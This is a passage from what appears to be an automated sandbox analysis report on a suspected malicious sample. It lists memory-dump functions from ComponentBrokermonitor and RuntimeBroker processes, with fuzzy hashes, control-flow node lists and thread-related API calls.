                                                                                                    • Instruction ID: f2ffc9353ef7179b2578bdf93dba1ba870376fe8867a9c7d4896a7351170044a
                                                                                                    • Opcode Fuzzy Hash: cec0750f1b93bbd29e728068d3a70fd7610d7f4e2c32cc3f45b7e10b4935b803
                                                                                                    • Instruction Fuzzy Hash: 4A41C171E4952D8EEBA4EB54C8987BCB7B0EB55300F5041EA904DA72A1DEB82AC1CF05
                                                                                                    Function 00007FFD9BAC0C25 Relevance: .1, Instructions: 80COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: beb5d5e499d24ddf4f87b0acfcbbb8ab9928fd91ab3d18b41e2e24d9ee3254ac
                                                                                                    • Instruction ID: c761ded6bd604901629d4b21a905172ab654acb77506036919d409d10a7106b1
                                                                                                    • Opcode Fuzzy Hash: beb5d5e499d24ddf4f87b0acfcbbb8ab9928fd91ab3d18b41e2e24d9ee3254ac
                                                                                                    • Instruction Fuzzy Hash: 4A210875B0E28D4BE732ABA8CC202FD7760EF52711F0606B7C1549B1E3CA7826058B95
                                                                                                    Function 00007FFD9BAC1172 Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 56347ed0521b8f4e6e31270a7c1cb25e9b3fa74244236cf9713129dee895e6f9
                                                                                                    • Instruction ID: c19f3397b46e4b71677677c1f49feda1f7724135f9d84d370b738b605c52a471
                                                                                                    • Opcode Fuzzy Hash: 56347ed0521b8f4e6e31270a7c1cb25e9b3fa74244236cf9713129dee895e6f9
                                                                                                    • Instruction Fuzzy Hash: DF21C630A1491D8FDB94FBA8C8A8ABDB7F1FF28304B11456AD409D72A1DF74A981CB44
                                                                                                    Function 00007FFD9BAC0C40 Relevance: .1, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3b42ca3252f4e73343dc8e97565cadd1fb1b62cb128079c8065af24ab7927857
                                                                                                    • Instruction ID: 0e137114d0092c3e973d21d915629fc564c7dfe36bbbf46e3f1610787779ef79
                                                                                                    • Opcode Fuzzy Hash: 3b42ca3252f4e73343dc8e97565cadd1fb1b62cb128079c8065af24ab7927857
                                                                                                    • Instruction Fuzzy Hash: 58112931A0F29D8FE722ABA4C8202F97B70EF42710F0546B7D454DB1E3CA782609CB55
                                                                                                    Function 00007FFD9BAC0B7F Relevance: .1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1d045487ee9bc2e0991d4d9adbcf9e233bc11e5c319a86de3a18e473568bb48a
                                                                                                    • Instruction ID: ce73e6b451ff9534d0bd293596763689a0d66f8f05a81aae7a7d2433e9977792
                                                                                                    • Opcode Fuzzy Hash: 1d045487ee9bc2e0991d4d9adbcf9e233bc11e5c319a86de3a18e473568bb48a
                                                                                                    • Instruction Fuzzy Hash: 8E115A3166924D8FCF44EF6CC8919EAB7A0FF59308F0102AAE84DD3251C730A564CB81
                                                                                                    Function 00007FFD9BAC4B6F Relevance: .1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e864652300de8a606cf3d5965fc07d723ba137fc0988361cd5264102c2a6e98d
                                                                                                    • Instruction ID: 6a215bf8e23418979dd23d3ebbb43f790c0d0ac0da9d9eef289a17ad06aea3bf
                                                                                                    • Opcode Fuzzy Hash: e864652300de8a606cf3d5965fc07d723ba137fc0988361cd5264102c2a6e98d
                                                                                                    • Instruction Fuzzy Hash: C321A570D4966D8AEBB4EB54C8A83FCB6B1EB54301F5141E9D00DA32A1CFB86AC4DF04
                                                                                                    Function 00007FFD9BAC0C50 Relevance: .0, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ce5f3ccf6c4bb4cf984d73f5f9e6b44ec4f2551333d61ba1aec5c45719ced4fc
                                                                                                    • Instruction ID: 1142e0ca36ac30720468f01ca25efb6f178bd565f1ddb7411e106cf91a9ef1c7
                                                                                                    • Opcode Fuzzy Hash: ce5f3ccf6c4bb4cf984d73f5f9e6b44ec4f2551333d61ba1aec5c45719ced4fc
                                                                                                    • Instruction Fuzzy Hash: C701D270E0E28E8FE722ABA4C8202F97B70EF02710F0546B7D454DB1E3CA782604C745
                                                                                                    Function 00007FFD9BAC06A5 Relevance: .0, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 94282658873c2b30c05acde5b02b01038a2811cfc96288bffa2fb6283bd7ad9e
                                                                                                    • Instruction ID: 5bfa1054adfb64e8bac8686046fc9076c683c6dcc925602b6581b70bae9a2ddc
                                                                                                    • Opcode Fuzzy Hash: 94282658873c2b30c05acde5b02b01038a2811cfc96288bffa2fb6283bd7ad9e
                                                                                                    • Instruction Fuzzy Hash: 9DF03030A05A4E9FEB60FF98D4596FD77A0FFA4304F510536E41CC21A0DAB462908B84
                                                                                                    Function 00007FFD9BAC13A8 Relevance: .0, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 17a53e886d47b573aad22c58ff1dec0b63c156184a310712d5ca5b0d5fb60cb4
                                                                                                    • Instruction ID: 4a0d16f89504b55a2c8cd88e9d022537469c0e4a31469c3e9e669b08f77a280d
                                                                                                    • Opcode Fuzzy Hash: 17a53e886d47b573aad22c58ff1dec0b63c156184a310712d5ca5b0d5fb60cb4
                                                                                                    • Instruction Fuzzy Hash: 6AF0BD30A1494D9FDF94EF68C459AAE7BE0FF68304F014565F81CC3261DA30E590CB80
                                                                                                    Function 00007FFD9BAC06C8 Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 23823f365d6b469cce2aad50de8014bef72604db300592d602a8715ae56ac98d
                                                                                                    • Instruction ID: 71bcbd98e214445af638de226efdca667f86cb238a437365b659464c65e58b77
                                                                                                    • Opcode Fuzzy Hash: 23823f365d6b469cce2aad50de8014bef72604db300592d602a8715ae56ac98d
                                                                                                    • Instruction Fuzzy Hash: 53F0123091594E9FDB90EF64C9496FE77E0FF54304F414566E81CD2160DA70A6A0CB80

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FFD9BAC086A Relevance: .2, Instructions: 229COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 72c32f3f7053934c4b2bddeb484e4f1d1387a81bfcbb090fde03dfd7052aeffd
                                                                                                    • Instruction ID: bdeb6f0c05e1ace99fe518105e567a09775c61569d519f6e538b211563c41460
                                                                                                    • Opcode Fuzzy Hash: 72c32f3f7053934c4b2bddeb484e4f1d1387a81bfcbb090fde03dfd7052aeffd
                                                                                                    • Instruction Fuzzy Hash: C6713270A08A4D8FEBA8DF58C855BF977E1FF69310F10422AE84EC7291DB749585CB81
                                                                                                    Function 00007FFD9BC6A5DD Relevance: .1, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1785340995.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bc60000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fc62d10999d1b390d3d812f1049315837784bd18367df32acb6e09e53dbe32b6
                                                                                                    • Instruction ID: 0f9180e67d2ca49b27d575f32be2efc5646c7afa8888535f99a948bb5e4b1c07
                                                                                                    • Opcode Fuzzy Hash: fc62d10999d1b390d3d812f1049315837784bd18367df32acb6e09e53dbe32b6
                                                                                                    • Instruction Fuzzy Hash: A631E474E09A1D8FCF88DF98D451AADBBF1FB69300F20516AE419E3291DA35A941CB44
                                                                                                    Function 00007FFD9BAC09B0 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                    • API String ID: 0-1692736845
                                                                                                    • Opcode ID: ce41bd3106aa282b0b4fd79377f6a69b89c8b005cbcf61b845348d92fd41be8c
                                                                                                    • Instruction ID: 5a6305f008e394f89b6146a7f8f740deab5cc55d83e459248f923fe888959450
                                                                                                    • Opcode Fuzzy Hash: ce41bd3106aa282b0b4fd79377f6a69b89c8b005cbcf61b845348d92fd41be8c
                                                                                                    • Instruction Fuzzy Hash: CC414B06B0A46A45E329B7FD78229FD6B449FA933FB0843B7F95E8D0C74D486081C2D9

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:4%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:12
                                                                                                    Total number of Limit Nodes:0
                                                                                                    execution_graph 19090 7ffd9bc7d700 19091 7ffd9bc7d706 ResumeThread 19090->19091 19093 7ffd9bc7d814 19091->19093 19086 7ffd9bc7c00d 19087 7ffd9bc7c01b SuspendThread 19086->19087 19089 7ffd9bc7c0f4 19087->19089 19082 7ffd9bc7d869 19083 7ffd9bc7d877 CloseHandle 19082->19083 19085 7ffd9bc7d954 19083->19085 19078 7ffd9bc7f4c5 19079 7ffd9bc7f4df GetFileAttributesW 19078->19079 19081 7ffd9bc7f5a5 19079->19081

                                                                                                    Executed Functions

                                                                                                    Function 00007FFD9C1B609D Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: gbu
                                                                                                    • API String ID: 0-1863516185
                                                                                                    • Opcode ID: 1a0894d444d4e3c34716ae48e4b15090d2ffd9907cfebea52ef43c50b168ca34
                                                                                                    • Instruction ID: a45fde28484ff76155d3c914b6edd46453b8436c64d7f5e78a009e5642271f76
                                                                                                    • Opcode Fuzzy Hash: 1a0894d444d4e3c34716ae48e4b15090d2ffd9907cfebea52ef43c50b168ca34
                                                                                                    • Instruction Fuzzy Hash: 7DC11A30E5561D8FEB98EB68C8A5AA977B1FF59304F9445B9D00DE32D6CF34A9818B00
                                                                                                    Function 00007FFD9BAD0D74 Relevance: .3, Instructions: 288COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 221 7ffd9bad0d74-7ffd9bad0d87 222 7ffd9bad0d89 221->222 223 7ffd9bad0d8a-7ffd9bad0dc9 221->223 222->223 225 7ffd9bad0dcb 223->225 226 7ffd9bad0dd0-7ffd9bad0e39 call 7ffd9bad07d0 223->226 225->226 235 7ffd9bad0e3b-7ffd9bad0e6d 226->235 236 7ffd9bad0e70-7ffd9bad0ebb 226->236 235->236 243 7ffd9bad0ed3-7ffd9bad0fb3 236->243 244 7ffd9bad0ebd-7ffd9bad0ed2 236->244 256 7ffd9bad0fbb-7ffd9bad10ac 243->256 244->243
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9851779636106e0cecabe01ca74265205252e70bd049d0a72bd729726c03e1d0
                                                                                                    • Instruction ID: 238af2f146c9d1d85c3a010dcf2b50486ab16dbfd18c3c1c5a8d38e743dd6f00
                                                                                                    • Opcode Fuzzy Hash: 9851779636106e0cecabe01ca74265205252e70bd049d0a72bd729726c03e1d0
                                                                                                    • Instruction Fuzzy Hash: 5AA1AE71A18A9D8FE798DB68C8757A97FE1FF99314F40027ED048D72D6CAB42841CB40
                                                                                                    Function 00007FFD9BC7D700 Relevance: 1.7, APIs: 1, Instructions: 172threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2910129645.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bc70000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 31cd5995fa196e9482e06bf3a310afdf15932412d168eeb86077d964423053a2
                                                                                                    • Instruction ID: ae4a609b03b1fec215347ae2a8104e0e91aa4704456884f53a46ae5b629e7d31
                                                                                                    • Opcode Fuzzy Hash: 31cd5995fa196e9482e06bf3a310afdf15932412d168eeb86077d964423053a2
                                                                                                    • Instruction Fuzzy Hash: FC518E7090D78C8FDB56DFA8C894AE9BFF0EF16310F1441ABD049DB2A2CA349846CB11
                                                                                                    Function 00007FFD9BC7C00D Relevance: 1.6, APIs: 1, Instructions: 141threadinjectionCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 12 7ffd9bc7c00d-7ffd9bc7c019 13 7ffd9bc7c024-7ffd9bc7c0f2 SuspendThread 12->13 14 7ffd9bc7c01b-7ffd9bc7c023 12->14 18 7ffd9bc7c0f4 13->18 19 7ffd9bc7c0fa-7ffd9bc7c144 13->19 14->13 18->19
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2910129645.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bc70000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SuspendThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 3178671153-0
                                                                                                    • Opcode ID: a9bd67c2ac1ebe5f39773600a1b2fb69afef45645fd2aa6a614484f832c1b0b0
                                                                                                    • Instruction ID: 0ef56de02b623a49b2bb4e6c738db981c15e39e0c184fc8c09fa23e2dbe21a7b
                                                                                                    • Opcode Fuzzy Hash: a9bd67c2ac1ebe5f39773600a1b2fb69afef45645fd2aa6a614484f832c1b0b0
                                                                                                    • Instruction Fuzzy Hash: 99416C30E0864D8FDB58DFA8D894BEDBBF0FF5A310F10416AD049E7292DA30A885CB41
                                                                                                    Function 00007FFD9BC7F4C5 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 22 7ffd9bc7f4c5-7ffd9bc7f5a3 GetFileAttributesW 26 7ffd9bc7f5ab-7ffd9bc7f5e9 22->26 27 7ffd9bc7f5a5 22->27 27->26
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2910129645.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bc70000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 88c53cb48600012aa14f125d1fc6ba4b67b69e8d82bf14f5618f1128c260f875
                                                                                                    • Instruction ID: 787192b93d0bab93d1e2ce20618a10696be4f3d0f31df2613c4ecec48c4dadaa
                                                                                                    • Opcode Fuzzy Hash: 88c53cb48600012aa14f125d1fc6ba4b67b69e8d82bf14f5618f1128c260f875
                                                                                                    • Instruction Fuzzy Hash: 1F411870E08A4C8FDB98DFA8D895BEDBBF0FB59310F10416AD049E7252DA719885CB40
                                                                                                    Function 00007FFD9BC7D869 Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 85 7ffd9bc7d869-7ffd9bc7d875 86 7ffd9bc7d880-7ffd9bc7d952 CloseHandle 85->86 87 7ffd9bc7d877-7ffd9bc7d87f 85->87 91 7ffd9bc7d954 86->91 92 7ffd9bc7d95a-7ffd9bc7d9ae 86->92 87->86 91->92
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2910129645.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bc70000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: 961c31b09139a34c963b4328ac2dd85d07b95067bb47d6b88d2cfb472b05aa2e
                                                                                                    • Instruction ID: 933002a257d1c4aa8d27fc86646020721bdc1867a601685c64197fe6b37ec765
                                                                                                    • Opcode Fuzzy Hash: 961c31b09139a34c963b4328ac2dd85d07b95067bb47d6b88d2cfb472b05aa2e
                                                                                                    • Instruction Fuzzy Hash: 5B417C70D0864C8FDB58DFA8D894BEDBBF0FF5A310F1041AAD049E7292DA34A885CB41
                                                                                                    Function 00007FFD9C1B1568 Relevance: .2, Instructions: 238COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 393 7ffd9c1b1568-7ffd9c1b1570 395 7ffd9c1b14f8-7ffd9c1b14fd 393->395 396 7ffd9c1b1572-7ffd9c1b42fa 393->396 395->393 399 7ffd9c1b42fc 396->399 400 7ffd9c1b4301-7ffd9c1b4315 396->400 399->400 403 7ffd9c1b4317-7ffd9c1b432e 400->403 404 7ffd9c1b4332-7ffd9c1b44fd 400->404 403->404 421 7ffd9c1b4508-7ffd9c1b4514 404->421 422 7ffd9c1b451b-7ffd9c1b453a 421->422 423 7ffd9c1b453c-7ffd9c1b4541 422->423 424 7ffd9c1b4543-7ffd9c1b4547 422->424 423->424 425 7ffd9c1b454b-7ffd9c1b454c 424->425 426 7ffd9c1b4549 424->426 427 7ffd9c1b454e-7ffd9c1b455a 425->427 426->427
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d87f2f437b15b9165e7d53e79c25f92e027c3335f28a0f43809d8154228626b4
                                                                                                    • Instruction ID: e2ef18aa5e4640b420c68eb39dbe1ecf5beb14df5e5387de9f95929756850a0e
                                                                                                    • Opcode Fuzzy Hash: d87f2f437b15b9165e7d53e79c25f92e027c3335f28a0f43809d8154228626b4
                                                                                                    • Instruction Fuzzy Hash: 27911730A08A1E8FDB58EF98D864BADB3B2FF59315F5041A9E40DE7295CB346981CF41
                                                                                                    Function 00007FFD9BAD08D0 Relevance: .2, Instructions: 180COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 429 7ffd9bad08d0-7ffd9bad08d9 431 7ffd9bad08db-7ffd9bad08e6 429->431 432 7ffd9bad0916-7ffd9bad0949 429->432 431->432 435 7ffd9bad094b-7ffd9bad095f 432->435 436 7ffd9bad0986-7ffd9bad098f 432->436
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b12fa910d3916115f175c0512c1ef48acb31f952294b49d15a437bccadf9b34c
                                                                                                    • Instruction ID: a0f255e02cdac69759e9ee4eb532b3fe98e1e8e2286adc376b5624f393fd934f
                                                                                                    • Opcode Fuzzy Hash: b12fa910d3916115f175c0512c1ef48acb31f952294b49d15a437bccadf9b34c
                                                                                                    • Instruction Fuzzy Hash: 0A51B331A0855D8FDB54FFACE8A5AFD7BA0FF58329F0402BBD409D71A6CA246481C785
                                                                                                    Function 00007FFD9BAD163A Relevance: .1, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0ab4d76651348a71aff1f238fd26a432aeb6d7ff1475cc51e8570d0a7e21cb6e
                                                                                                    • Instruction ID: 7a8869e54eab5998ff369d7720370a6cd5933c311fd66b21aa8a2d2f76d25943
                                                                                                    • Opcode Fuzzy Hash: 0ab4d76651348a71aff1f238fd26a432aeb6d7ff1475cc51e8570d0a7e21cb6e
                                                                                                    • Instruction Fuzzy Hash: 84412432F0D65D8FE720EB9CD8B55E93BA0EF95325F0501BBE1888B2A2EE3515058791
                                                                                                    Function 00007FFD9C1C2008 Relevance: .1, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e01352e35f6edfbcd35a1a2e403f02df4df462267e83ea1b539753def645b826
                                                                                                    • Instruction ID: 5b2a9083b701dd7bb08d7ca1fa2f73edc6aff1a4f28fd875dbaf2980835b0440
                                                                                                    • Opcode Fuzzy Hash: e01352e35f6edfbcd35a1a2e403f02df4df462267e83ea1b539753def645b826
                                                                                                    • Instruction Fuzzy Hash: 1841E13290864E8FDB54FFA8C8959FA7BF0FF24319F0405A7E45DC6192DA34A5A0CB84
                                                                                                    Function 00007FFD9BAD0908 Relevance: .1, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a0b4602f576bff30e6e660a460a968b290e393ce1fd861ac6f6517ee10c44bbe
                                                                                                    • Instruction ID: fb100260e5bfadc43a62fb50df5c0790193c14904ed4c6bc5b4eb5978752b773
                                                                                                    • Opcode Fuzzy Hash: a0b4602f576bff30e6e660a460a968b290e393ce1fd861ac6f6517ee10c44bbe
                                                                                                    • Instruction Fuzzy Hash: AF516C30A0890E9FCF84EF98D494EEDBBF1FF58325B150169E419E7260DA74E990CB90
                                                                                                    Function 00007FFD9C1BC0DD Relevance: .1, Instructions: 125COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
